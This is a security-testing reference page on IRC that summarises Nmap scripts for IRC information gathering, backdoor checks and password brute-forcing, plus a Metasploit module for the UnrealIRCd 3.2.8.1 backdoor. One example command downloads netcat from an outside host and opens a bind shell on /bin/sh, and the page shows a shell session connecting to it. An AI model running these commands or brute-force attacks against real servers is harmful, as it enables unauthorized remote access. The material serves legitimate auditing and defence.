About IRC

Internet Relay Chat (IRC) is an application layer protocol that facilitates communication in the form of text. The chat process works on a client/server networking model. IRC clients are computer programs that users can install on their system or web-based applications running either locally in the browser or on 3rd party server. These clients communicate with chat servers to transfer messages to other clients. IRC is mainly designed for group communication in discussion forums, called channels, but also allows one-on-one communication via private messages as well as chat and data transfer, including file sharing.

NMAP

File irc-info

Script types: portrule 
Categories: defaultdiscoverysafe 
Download: https://svn.nmap.org/nmap/scripts/irc-info.nse

User Summary

Gathers information from an IRC server.

It uses STATS, LUSERS, and other queries to obtain this information.

Example Usage

nmap -sV -sC <target>

Script Output

6665/tcp open     irc | irc-info: |   server: asimov.freenode.net |   version: ircd-seven-1.1.3(20111112-b71671d1e846,charybdis-3.4-dev). asimov.freenode.net |   servers: 31 |   ops: 36 |   chans: 48636 |   users: 84883 |   lservers: 1 |   lusers: 4350 |   uptime: 511 days, 23:02:29 |   source host: source.example.com |_  source ident: NONE or BLOCKED

File irc-unrealircd-backdoor

Script types: portrule 
Categories: exploitintrusivemalwarevuln 
Download: https://svn.nmap.org/nmap/scripts/irc-unrealircd-backdoor.nse

User Summary

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.

The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned) we have no way of getting the output of the command. It can, however, be used to start a netcat listener as demonstrated here:

  $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  $ ncat -vv localhost 4444
  Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
  Ncat: Connected to 127.0.0.1:4444.
  pwd
  /home/ron/downloads/Unreal3.2-bad
  whoami
  ron

Metasploit can also be used to exploit this vulnerability.

In addition to running arbitrary commands, the irc-unrealircd-backdoor.kill script argument can be passed, which simply kills the UnrealIRCd process.

Reference:

File irc-brute

Script types: portrule 
Categories: bruteintrusive 
Download: https://svn.nmap.org/nmap/scripts/irc-brute.nse

User Summary

Performs brute force password auditing against IRC (Internet Relay Chat) servers.

Script Arguments

passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb

See the documentation for the unpwdb library.

creds.[service], creds.global

See the documentation for the creds library.

brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass

See the documentation for the brute library.

Example Usage

nmap --script irc-brute -p 6667 <ip>

Script Output

PORT     STATE SERVICE 6667/tcp open  irc | irc-brute: |   Accounts |     password - Valid credentials |   Statistics |_    Performed 1927 guesses in 36 seconds, average tps: 74

File irc-sasl-brute

Script types: portrule 
Categories: bruteintrusive 
Download: https://svn.nmap.org/nmap/scripts/irc-sasl-brute.nse

User Summary

Performs brute force password auditing against IRC (Internet Relay Chat) servers supporting SASL authentication.

Script Arguments

irc-sasl-brute.threads

the number of threads to use while brute-forcing. Defaults to 2.

passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb

See the documentation for the unpwdb library.

creds.[service], creds.global

See the documentation for the creds library.

brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass

See the documentation for the brute library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script irc-sasl-brute -p 6667 <ip>

Script Output

PORT     STATE SERVICE REASON
6667/tcp open  irc     syn-ack
| irc-sasl-brute:
|   Accounts
|     root:toor - Valid credentials
|   Statistics
|_    Performed 60 guesses in 29 seconds, average tps: 2

Metasploit

unix/irc/unreal_ircd_3281_backdoor

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

use unix/irc/unreal_ircd_3281_backdoor